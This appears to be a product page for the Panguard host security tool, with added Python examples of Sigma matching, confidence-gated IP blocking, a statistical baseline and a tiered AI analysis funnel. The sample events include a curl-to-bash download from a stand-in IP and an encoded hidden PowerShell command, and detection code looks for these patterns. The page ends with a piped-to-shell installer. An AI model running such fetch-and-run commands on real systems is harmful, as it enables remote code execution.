HOW IT WORKS

How Panguard Protects You

Five layers of defense. Three tiers of AI. One command to deploy.

AT A GLANCE

Security that thinks in layers

Each layer catches what the previous one misses. Together, they form a defense system that adapts to your environment.

<50ms: average detection time

90%: share of threats handled by rules alone, with no AI involved

7 days: learning period before Panguard acts on what it sees

FIVE DETECTION LAYERS

Five layers that catch what others miss

From static analysis to contextual memory, each layer adds intelligence.

Layer 1

Environment Discovery

Automatically maps your infrastructure: OS, services, open ports, installed packages, running processes.

This is how Panguard learns what "normal" looks like for your specific environment.

Layer 2

Rules Engine

3,155 Sigma rules + 926 YARA rules + Suricata network IDS + Falco eBPF monitoring.

Handles about 90% of threats in under 50 ms, with no AI involved.
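The rules layer is worth seeing concretely. Below is an added example, not Panguard's rules engine or any of its shipped rules: a toy matcher for the Sigma rule format, which is what the 3,155 Sigma rules are written in. A Sigma rule is YAML whose detection block holds named selections and a condition that combines them; here the rule is written as the Python dict that a YAML loader would produce, so the example runs without extra packages. The rule, the Sysmon-style field names and the three events are all constructed for this illustration.

```python
"""Toy Sigma-style matcher: an added example, not Panguard's rules engine.

The rule below is the dict a YAML loader would produce from a Sigma file; it
and the events are constructed. Only the modifiers used here are implemented.
"""
import re
import time
from typing import Any, Dict, List, Tuple

# Constructed rule modelled on the Sigma process_creation category.
RULE: Dict[str, Any] = {
    "title": "Encoded PowerShell command line (constructed example rule)",
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["-enc", "-EncodedCommand"],  # a list is an OR
        },
        "filter": {  # hypothetical exclusion for launches from the desktop shell
            "ParentImage|endswith": "\\explorer.exe",
        },
        "condition": "selection and not filter",
    },
}

# Constructed events with Sysmon-style field names, not real telemetry.
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo...",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Process",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _match_field(value: str, pattern: str, modifier: str) -> bool:
    """One field test. Sigma string matching is case-insensitive ('re' excepted)."""
    if modifier == "re":
        return re.search(pattern, value) is not None
    v, p = value.lower(), pattern.lower()
    if modifier == "contains":
        return p in v
    if modifier == "startswith":
        return v.startswith(p)
    if modifier == "endswith":
        return v.endswith(p)
    return v == p  # no modifier: plain equality (wildcards not implemented here)


def match_selection(event: Dict[str, str], selection: Dict[str, Any]) -> bool:
    """Every key in a selection must match (AND); a list of values is an OR."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        value = event.get(field)
        if value is None:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not any(_match_field(value, str(p), modifier) for p in patterns):
            return False
    return True


def eval_condition(condition: str, results: Dict[str, bool]) -> bool:
    """Recursive-descent evaluator for and / or / not / parentheses over
    selection names, so rule-controlled text never reaches eval()."""
    tokens = re.findall(r"\(|\)|\w+", condition)
    pos = 0

    def peek() -> str:
        return tokens[pos] if pos < len(tokens) else ""

    def take() -> str:
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def factor() -> bool:
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            val = expr()
            take()  # the closing parenthesis
            return val
        return results[tok]  # KeyError for a selection the rule never defined

    def term() -> bool:
        left = factor()
        while peek() == "and":
            take()
            right = factor()
            left = left and right
        return left

    def expr() -> bool:
        left = term()
        while peek() == "or":
            take()
            right = term()
            left = left or right
        return left

    return expr()


def evaluate(rule: Dict[str, Any], event: Dict[str, str]) -> bool:
    det = rule["detection"]
    results = {name: match_selection(event, sel)
               for name, sel in det.items() if name != "condition"}
    return eval_condition(det["condition"], results)


def scan(rule: Dict[str, Any], events: List[Dict[str, str]]) -> Tuple[List[int], float]:
    """Return indexes of matching events and the elapsed time in microseconds."""
    start = time.perf_counter()
    hits = [i for i, ev in enumerate(events) if evaluate(rule, ev)]
    return hits, (time.perf_counter() - start) * 1e6


if __name__ == "__main__":
    hits, micros = scan(RULE, EVENTS)
    print(f"{RULE['title']!r} matched events {hits} in {micros:.0f} us")
```

Only the first event fires: it is PowerShell with an encoded command and a scripting-host parent, while the second is an interactive launch excluded by the filter and the third is not PowerShell at all. This is also why rules are fast and cheap: each check is a handful of string comparisons with no model involved.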

Layer 3

Behavioral Baseline

7-day learning period. Panguard observes your system without acting and builds a statistical model of normal behavior for this host.

Switches to protection mode on day 8, so baseline alerts are raised only once there is a baseline to compare against. Start the learning period on a system you believe is clean: whatever is already running when learning begins becomes part of "normal".

Layer 4

AI Analysis

When rules can't explain a behavior, AI steps in: local first (Ollama on your own GPU, fully offline), cloud only when the local model is uncertain.

Three-tier funnel: 90% rules / 7% local AI / 3% cloud AI. Cost: ~$0.008 per cloud analysis.

Layer 5

Automated Response

6 response actions: block IP, kill process, quarantine file, alert, snapshot evidence, escalate.

Confidence > 90%: executes automatically. 70-90%: asks you first. < 70%: notifies only.

AI FUNNEL

Three tiers. Minimum cost. Maximum accuracy.

90% of threats don't need AI. We use rules first, AI second, cloud last.

Rules Engine

90%
  • 3,155 Sigma detection rules
  • 926 YARA malware signatures
  • Suricata network IDS rules
  • Falco eBPF system call monitoring
  • Behavioral baseline deviations

<50ms per event

Local AI

7%
  • Ollama running on your machine
  • Runs on NVIDIA GPU for acceleration
  • Fully offline -- data never leaves
  • Handles ambiguous events rules can't classify

~2s per analysis

Cloud AI

3%
  • Claude / OpenAI (configurable)
  • Only invoked when local AI is uncertain
  • Cost: ~$0.008 per analysis
  • Multi-step reasoning chains (up to 8 steps)

~5s per analysis

AGENT PIPELINE

Four AI Agents. One Investigation Engine.

Each agent has a specialized role. Together, they form an autonomous security team.

DetectAgent

Monitors 5 sources: network, processes, filesystem, system logs, normalized events.

AnalyzeAgent

Correlates alerts, determines severity, maps to MITRE ATT&CK framework.

RespondAgent

Executes response based on confidence threshold. Auto, ask, or notify.

ReportAgent

Generates human-readable incident report, sends via Telegram/Slack/Email.

InvestigationEngine

Deep-dives complex incidents with up to 8-step reasoning chains.

AUTOMATED RESPONSE

Six actions. Three confidence levels.

Panguard doesn't just detect. It acts.

Block IP

Cross-platform firewall rule with auto-unblock timer

Kill Process

SIGTERM then SIGKILL with process tree cleanup

Quarantine File

Isolates the file, records its SHA-256 hash, and can restore it later

Alert

Send to your channels in plain language

Snapshot Evidence

Forensic capture of the event context

Escalate

Notify team lead or external SOC

> 90%: Automatic execution
70 - 90%: Asks you first via Chat
< 70%: Notifies only
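The confidence gate and the block-IP action can be shown end to end. The following is an added example, not Panguard's RespondAgent: it maps a confidence to auto / ask / notify, keeps a block list with a TTL so blocks expire on their own, and builds the add and remove firewall commands as strings rather than executing them. The iptables and netsh invocations, the rule-name prefix, the allowlist and the sample addresses are this example's assumptions; the 90% and 70% thresholds are the ones stated above.

```python
"""Confidence-gated response with a block-IP action and auto-unblock timer.

Added example, not Panguard's code. Firewall commands are returned as strings
and never executed, so this runs anywhere; the iptables/netsh forms, the
allowlist and the sample IPs are this example's assumptions.
"""
from dataclasses import dataclass
import ipaddress
from typing import Dict, List, Optional, Sequence

AUTO_THRESHOLD = 0.90  # above this: act automatically
ASK_THRESHOLD = 0.70   # from here up to AUTO_THRESHOLD: ask first; below: notify only


def decide_mode(confidence: float) -> str:
    """Map a confidence in [0, 1] to 'auto', 'ask' or 'notify'."""
    if not 0.0 <= confidence <= 1.0:
        raise ValueError("confidence must be in [0, 1]")
    if confidence > AUTO_THRESHOLD:
        return "auto"
    if confidence >= ASK_THRESHOLD:
        return "ask"
    return "notify"


@dataclass
class BlockEntry:
    ip: str
    expires_at: float
    reason: str


class BlockList:
    """Tracks blocked IPs with a TTL and emits add/remove firewall commands."""

    def __init__(self, platform: str, default_ttl: float = 3600.0,
                 allowlist: Sequence[str] = ()):
        if platform not in ("linux", "windows"):
            raise ValueError(f"unsupported platform {platform!r}")
        self.platform = platform
        self.default_ttl = default_ttl
        # Management ranges that must never be blocked, however confident the alert.
        self.allowlist = [ipaddress.ip_network(a) for a in allowlist]
        self.entries: Dict[str, BlockEntry] = {}

    def _command(self, ip: str, add: bool) -> str:
        if self.platform == "linux":
            return f"iptables {'-I' if add else '-D'} INPUT -s {ip} -j DROP"
        name = f"example-block-{ip}"  # hypothetical naming scheme
        if add:
            return (f'netsh advfirewall firewall add rule name="{name}" '
                    f'dir=in action=block remoteip={ip}')
        return f'netsh advfirewall firewall delete rule name="{name}"'

    def block(self, ip: str, reason: str, now: float,
              ttl: Optional[float] = None) -> Optional[str]:
        """Return the command to block `ip`, or None when nothing should run."""
        addr = ipaddress.ip_address(ip)  # validate before the value nears a shell command
        if any(addr in net for net in self.allowlist):
            return None
        key = str(addr)
        expires = now + (self.default_ttl if ttl is None else ttl)
        if key in self.entries:
            self.entries[key].expires_at = expires  # already blocked: extend, no new rule
            return None
        self.entries[key] = BlockEntry(key, expires, reason)
        return self._command(key, add=True)

    def expire(self, now: float) -> List[str]:
        """Auto-unblock: drop entries past their TTL and return their delete commands."""
        due = [e for e in self.entries.values() if e.expires_at <= now]
        for e in due:
            del self.entries[e.ip]
        return [self._command(e.ip, add=False) for e in due]


def plan_response(confidence: float, action: str, target: str, reason: str,
                  blocklist: BlockList, now: float) -> Dict[str, object]:
    """Decide the mode and, for an automatic block_ip, produce the command to run."""
    mode = decide_mode(confidence)
    plan: Dict[str, object] = {"mode": mode, "action": action,
                               "target": target, "commands": []}
    if mode == "auto" and action == "block_ip":
        cmd = blocklist.block(target, reason, now)
        if cmd:
            plan["commands"] = [cmd]
    return plan


if __name__ == "__main__":
    bl = BlockList("linux", default_ttl=600, allowlist=["10.0.0.0/8"])
    print(plan_response(0.97, "block_ip", "203.0.113.7", "ssh brute force", bl, now=0.0))
    print(plan_response(0.80, "block_ip", "198.51.100.9", "port scan", bl, now=0.0))
    print(bl.expire(now=700.0))
```

Two details matter in practice: the target is parsed with ipaddress before it is interpolated anywhere, so an attacker-influenced field can never smuggle shell syntax into the firewall command, and an allowlist keeps a confident but wrong alert from locking you out of your own management network.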

7-DAY LEARNING

It watches before it acts.

Panguard learns your environment before making decisions, so baseline alerts begin only once there is a baseline to compare against.

1

Day 1-3

Observation

Process baseline, network patterns, file change patterns, user behavior.

2

Day 4-7

Statistical Modeling

Builds a mean and standard deviation model for each metric, so a deviation is measured in standard deviations from your own normal rather than against a fixed threshold.

3

Day 8+

Protection Mode

Auto-transition to active protection. Continuous learning -- baseline evolves with your environment.
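Layer 3 above and the three steps just described come down to one mechanism, shown here as an added example rather than Panguard's implementation: a running mean and standard deviation per metric (Welford's online algorithm), a learning gate that records but never scores until the learning period has passed, z-score scoring afterwards, and continuous learning that updates the baseline only from values it judged normal, so the outliers it flags do not drag the baseline toward themselves. The metric name, the 3-sigma threshold, the standard-deviation floor, the minimum sample count and the connection counts are this example's assumptions.

```python
"""Behavioral baseline with a learning gate: an added example, not Panguard's Layer 3.

During the learning period the model only records. Afterwards each value is
scored as a z-score and learned only if it looks normal. Sample data is constructed.
"""
import math
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class RunningStats:
    n: int = 0
    mean: float = 0.0
    m2: float = 0.0  # running sum of squared deviations (Welford's algorithm)

    def update(self, x: float) -> None:
        self.n += 1
        delta = x - self.mean
        self.mean += delta / self.n
        self.m2 += delta * (x - self.mean)

    @property
    def stddev(self) -> float:
        return math.sqrt(self.m2 / (self.n - 1)) if self.n > 1 else 0.0


class Baseline:
    def __init__(self, learning_days: int = 7, z_threshold: float = 3.0,
                 min_stddev: float = 1.0, min_samples: int = 20):
        self.learning_days = learning_days
        self.z_threshold = z_threshold
        # Floor on sigma: a perfectly flat baseline must not turn every blip into a 50-sigma event.
        self.min_stddev = min_stddev
        # A sparse metric with too few samples keeps learning even after day 7.
        self.min_samples = min_samples
        self.stats: Dict[str, RunningStats] = {}

    def mode(self, metric: str, day: int) -> str:
        st = self.stats.get(metric)
        if day <= self.learning_days or st is None or st.n < self.min_samples:
            return "learning"
        return "protection"

    def observe(self, metric: str, value: float, day: int) -> Optional[float]:
        """Record `value`; return None while learning, otherwise its z-score."""
        st = self.stats.setdefault(metric, RunningStats())
        if self.mode(metric, day) == "learning":
            st.update(value)
            return None
        sigma = max(st.stddev, self.min_stddev)
        z = (value - st.mean) / sigma
        if abs(z) < self.z_threshold:
            st.update(value)  # continuous learning, from normal observations only
        return z

    def is_anomalous(self, z: Optional[float]) -> bool:
        return z is not None and abs(z) >= self.z_threshold


# Constructed metric: outbound connections per hour on one host, three samples a day.
LEARNING_SAMPLES: List[Tuple[int, float]] = [
    (day, v) for day in range(1, 8) for v in (42.0, 47.0, 39.0)
]
DAY8_SAMPLES: List[Tuple[int, float]] = [(8, 44.0), (8, 190.0), (8, 46.0)]


def run_demo() -> List[Tuple[int, float, Optional[float], bool]]:
    """Feed seven learning days then day 8; return (day, value, z, anomalous)."""
    baseline = Baseline()
    out = []
    for day, value in LEARNING_SAMPLES + DAY8_SAMPLES:
        z = baseline.observe("outbound_connections_per_hour", value, day)
        out.append((day, value, z, baseline.is_anomalous(z)))
    return out


if __name__ == "__main__":
    for day, value, z, anomalous in run_demo():
        shown = "learning" if z is None else f"z={z:+.1f}"
        print(f"day {day}: {value:6.1f}  {shown}  {'ANOMALY' if anomalous else ''}")
```

On day 8 the 44 and 46 land within a fraction of a standard deviation of the learned mean and are folded into the baseline; the 190 is tens of standard deviations out, is flagged, and is deliberately not learned.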

GRACEFUL DEGRADATION

Your protection never drops to zero.

Cloud down? Local AI takes over. Local AI down? Rules engine always runs.

Optimal

All layers active. Cloud AI + Local AI + Rules Engine.

Cloud Unavailable

Local AI handles complex analysis. Rules engine catches known threats.

LLM Offline

Rules engine + behavioral baseline. Still catches 90% of threats.

Emergency

Rules engine only. Core protection always running.
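The funnel from Layer 4 and the degradation ladder above are one routing decision, written out here as an added example rather than Panguard's engine. The rules, local-AI and cloud-AI tiers are plain callables so the logic runs offline: a tier returns a verdict, returns None when it cannot decide, or raises when it is down. Rules always run first; only undecided events escalate; the cloud is consulted only when the local verdict is uncertain; and a tier that fails is skipped while the others keep working. The sample indicator hash, the 0.70 "uncertain" floor, the constructed events and the stand-in tier logic are this example's assumptions; the $0.008 figure is the one stated above and is used only for bookkeeping.

```python
"""Three-tier analysis funnel with graceful degradation: an added example, not
Panguard's engine. Tiers are plain callables; events and indicators are constructed."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Set

CLOUD_COST_USD = 0.008         # per-analysis figure from the page, bookkeeping only
LOCAL_CONFIDENCE_FLOOR = 0.70  # assumption: below this a local verdict is "uncertain"


class TierUnavailable(Exception):
    """Raised by a tier that cannot be reached (cloud outage, Ollama not running)."""


@dataclass
class Verdict:
    label: str          # "benign" or "malicious"
    confidence: float   # 0..1
    tier: str = ""      # filled in by the funnel


Tier = Callable[[dict], Optional[Verdict]]


class Funnel:
    def __init__(self, rules: Tier, local_ai: Optional[Tier], cloud_ai: Optional[Tier]):
        self.tiers: List[tuple] = [("rules", rules), ("local", local_ai), ("cloud", cloud_ai)]
        self.resolved_by: Dict[str, int] = {"rules": 0, "local": 0, "cloud": 0, "none": 0}
        self.unavailable: Set[str] = set()  # production code would retry after a cooldown
        self.cloud_spend_usd = 0.0

    def analyze(self, event: dict) -> Verdict:
        fallback: Optional[Verdict] = None  # uncertain local verdict, used if cloud fails
        for name, tier in self.tiers:
            if tier is None or name in self.unavailable:
                continue
            try:
                verdict = tier(event)
            except TierUnavailable:
                self.unavailable.add(name)  # degrade: skip this tier, keep the rest running
                continue
            if name == "cloud":
                self.cloud_spend_usd += CLOUD_COST_USD
            if verdict is None:
                continue  # this tier could not decide: escalate
            verdict.tier = name
            if name == "local" and verdict.confidence < LOCAL_CONFIDENCE_FLOOR:
                fallback = verdict  # uncertain: only now is the cloud worth paying for
                continue
            self.resolved_by[name] += 1
            return verdict
        if fallback is not None:
            self.resolved_by["local"] += 1
            return fallback
        self.resolved_by["none"] += 1
        return Verdict("unknown", 0.0, "none")

    def degradation(self) -> str:
        have = {n for n, t in self.tiers if t is not None and n not in self.unavailable}
        if have == {"rules", "local", "cloud"}:
            return "optimal"
        if have == {"rules", "local"}:
            return "cloud unavailable"
        return "llm offline"  # rules (plus whatever baseline layer exists) only


# Constructed stand-ins for the real engines.
KNOWN_BAD_SHA256 = {"deadbeef" * 8}  # made-up indicator, not a real sample hash


def rules_tier(event: dict) -> Optional[Verdict]:
    if event.get("sha256") in KNOWN_BAD_SHA256:
        return Verdict("malicious", 0.99)
    if event.get("process") in ("sshd", "cron", "systemd-journald"):
        return Verdict("benign", 0.95)
    return None  # no rule fired


def local_ai_tier(event: dict) -> Optional[Verdict]:
    cmd = event.get("cmdline", "")
    if "curl" in cmd and "| bash" in cmd:
        return Verdict("malicious", 0.60)  # suspicious but uncertain: escalates
    return Verdict("benign", 0.80)


def make_cloud_tier(available: bool) -> Tier:
    def cloud(event: dict) -> Optional[Verdict]:
        if not available:
            raise TierUnavailable("cloud API unreachable")
        return Verdict("malicious" if "| bash" in event.get("cmdline", "") else "benign", 0.93)
    return cloud


EVENTS = [
    {"process": "sshd", "cmdline": "sshd: user [priv]"},
    {"process": "python3", "cmdline": "python3 app.py", "sha256": "deadbeef" * 8},
    {"process": "bash", "cmdline": "curl -s http://198.51.100.20/x.sh | bash"},
    {"process": "node", "cmdline": "node server.js"},
]


def run_demo(cloud_available: bool = True) -> Dict[str, object]:
    funnel = Funnel(rules_tier, local_ai_tier, make_cloud_tier(cloud_available))
    verdicts = [funnel.analyze(e) for e in EVENTS]
    return {"tiers": [v.tier for v in verdicts], "labels": [v.label for v in verdicts],
            "counts": funnel.resolved_by, "spend_usd": round(funnel.cloud_spend_usd, 3),
            "mode": funnel.degradation()}


if __name__ == "__main__":
    print(run_demo(cloud_available=True))
    print(run_demo(cloud_available=False))
```

With every tier up, two of the four events never leave the rules tier, one is settled locally, and only the ambiguous curl-pipe-to-shell event costs a cloud call. With the cloud down, that same event is answered by the uncertain local verdict instead of being dropped, and the funnel reports "cloud unavailable"; with no local model at all, it reports "llm offline" and the rules keep running.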

Ready to see it in action?

One command. Free to start. No account needed. As with any installer piped into a shell, you can download the script first, read it, and then run it.

$ curl -fsSL https://get.panguard.ai | bash